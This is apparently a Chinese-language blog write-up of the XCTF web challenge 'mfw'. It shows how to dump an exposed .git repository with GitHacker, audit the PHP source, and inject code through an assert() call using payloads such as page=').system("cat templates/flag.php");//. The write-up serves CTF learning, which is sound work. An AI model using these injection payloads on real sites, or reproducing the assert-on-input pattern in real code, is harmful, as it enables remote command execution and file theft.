XCTF WEB mfw
XCTF WEB mfw比赛打自闭了,需要好好学习打开网页看见(猜测git源码泄露):在URL后面加上./git发现:使用脚本,在Linux环境中:pip install requestsgit clone https://github.com/wangyihang/GitHacker.gitpython GitHacker.py [Website]得到源码:flag...
·
XCTF WEB mfw
- 比赛打自闭了,需要好好学习
打开网页看见(猜测git源码泄露):
在URL后面加上./git发现:
使用脚本,在Linux环境中:
pip install requests
git clone https://github.com/wangyihang/GitHacker.git
python GitHacker.py [Website]
得到源码:
flag文件貌似没得啥:
查看index.php文件内容得到PHP源码:
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
html代码........
代码审计以及思路:
了解assert()函数的使用:
assert()函数会将读入的代码当做PHP代码来执行,这就方便了!!
进行注入,注入的思路:
-
首先对strpos函数进行闭合,构造一下,page=’)
-
可以把后面
', '..') === false的给注释掉,构造page=').phpinfo();//,可以得到回显
-
或者不注释也行,直接插入,构造
page='.phpinfo().',也可以看见:
-
既然可以执行函数,那就简单了,使用system()函数(system函数详解),构造查看目录的payload:
?page='.system("ls").'或者page=').system("ls");//前者直接显示,后者在源码中才能看见。 -
由于源码直接下载有,所以直接构造得到flag的payload:
?page=').system("cat templates/flag.php");//或者?page='.system("cat templates/flag.php").'两者都需查看源码!!
更多推荐
7
0- 0
已为社区贡献1条内容
所有评论(0)